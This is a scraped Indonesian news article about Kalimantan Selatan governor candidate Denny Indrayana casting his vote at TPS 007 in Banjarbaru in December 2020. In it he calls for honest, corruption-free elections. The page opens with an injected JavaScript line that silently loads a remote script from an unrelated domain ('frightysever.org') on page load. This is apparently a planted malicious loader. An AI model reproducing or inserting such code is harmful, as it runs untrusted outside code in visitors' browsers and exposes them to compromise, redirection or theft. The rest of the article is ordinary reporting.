(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Pilgub Kalsel

Haji Denny Coblos di TPS 007, Harapkan Pilkada Aman dan Jurdil


KANALKALIMANTAN.COM, BANJARBARU – Calon Gubernur Kalsel Denny Indrayana menunaikan hak suaranya di Pilgub Kalsel dengan mencoblos di TPS 007, Keluruhan Komet, Kecamatan Banjarbaru Utara, Rabu (9/12/2020) pukul 09.15. Wita. Wamenkum HAM era Presiden SBY ini mencoblos didampingi istrinya Ida Rosidah.

Haji Denny -panggilan Denny Indrayana- datang ke TPS menggunakan baju koko putih dan sarung hijau. Sesampai di TPS yang lokasinya hanya berkisar 50 meter dari kediamannya, dia dipersilahkan mengisi buku hadir dan melaksanakan semua tahapan berkaitan protokol pencoblosan saat Covid-19. Usai mencoblos, Haji Denny pun kembali ke rumahnya di Gang Purnama, Banjarbaru.

Kepada sejumlah wartawan di lokasi pencoblosan, Haji Denny berharap kondisi Covid-19 tak terlalu signifikan berpengaruh terhadap partisipasi pemilih Pilkada.

“Memang suasananya tak seramai Pemilu sebelumnya karena dalam kondisi dan penerapan protokol Covid-19,” katanya.

 

Haji Denny mencoblos di TPS 007 Kelurahan Komet, Kecamatan Banjarbaru Utara. Foto: ist

Meski demikian, pegiat anti korupsi ini berpesan bahwa di momentum Pilkada yang bertepatan Hari Anti Korupsi Sedunia ini, bisa memberikan sinyal kuat prinsip anti korupsi di Pilkada yang jujur, bersih dan adil. “Karena semua berwal dari pemilu yang jurdil,” tegasnya.

Di sisi lain, Haji Denny juga mendorong adanya penghitungan suara suara di semua level dengan cermat, akurat, dan menghindari upaya manipulasi untuk kepentingan politik Pilkada yang mencederai demokrasi.

“Kita sendiri ada tim khusus untuk lakukan penghitungan, baik secara quick count dan real count sebagai data pembanding yang dilakukan lembaga survei dan KPU. Saya berharap prosesnya bisa dijaga, karena masa penghitungan juga masuk yang kritikal dimana potensi kecurangan bisa dilakukan,” tegasnya.

Ia bersyukur, bahwa dari informasi yang diterima pada Pilkada kali ini, kecenderungan money politics di Kalsel cukup menurun. Berbeda dengan gelar Pilkada sebelumnya.

“Saya berharap hal ini bisa terus dikawal agar daulat rakyat tidak dikalahkan dengan daulat uang,” katanya.
Pantauan di lokasi pencoblosan paslon di TPS 007 Komet, yang menjadi lokasi mencoblos Haji Denny, petugas KPPS sebelumnya sudah melakukan proses pemanggilan pemilih. Sekitar pukul 07.30 Wita, diawali proses pengambilan sumpah yang dipimpin Ketua KPPS, Anton Septiadi.

Pada kesempatan tersebut, ia menegaskan proses pencoblosan dilakukan dengan menerapkan protokol kesehatan secara ketat. Baik untuk anggota KPPS, saksi, maupun pemilih.

“Di TPS 007 ada sebanyak 261 pemilih terdiri dari RT 1 dan RT 2, RW 6 Kelurahan Komet, Kecamatan Banjarbaru Utara,” terangnya.

Proses pencoblosan akan berakhir pukul 12.00 Wita bagi pemilih DPT, dan jam 12.00-13.00 Wita untuk pemilih tambahan. (*)

Editor : Cell

 


Al Ghifari

Recent Posts

Berbaur dengan Masyarakat, Bupati dan Wabup Banjar Nobar Indonesia Vs Uzbekistan

KANALKALIMANTAN.COM, MARTAPURA - Alun-alun Ratu Zalecha, Martapura dipilih menjadi tempat nonton bareng (nobar) Semi Final… Read More

3 jam ago

Diakhiri Nobar Timnas, Pj Bupati Kapuas Menutup Expo Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi secara resmi menutup gelaran Expo… Read More

6 jam ago

Bingkisan Kebahagiaan PLN untuk Warga Kalsel yang Membutuhkan

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur (UIP3B) Kalimantan melalui… Read More

6 jam ago

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

KANALKALIMANTAN.COM, BANJARMASIN - Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman… Read More

6 jam ago

Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS – Tiga rekor Museum Rekor Indonesia (Muri) menjadi catatan kado Hari Jadi… Read More

7 jam ago

Ritual Laluhan dan Ngarunya Lengkapi Perayaan HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Momen perayaan Hari Jadi ke-218 Kota Kuala Kapuas dan Hari Ulang… Read More

7 jam ago

This website uses cookies.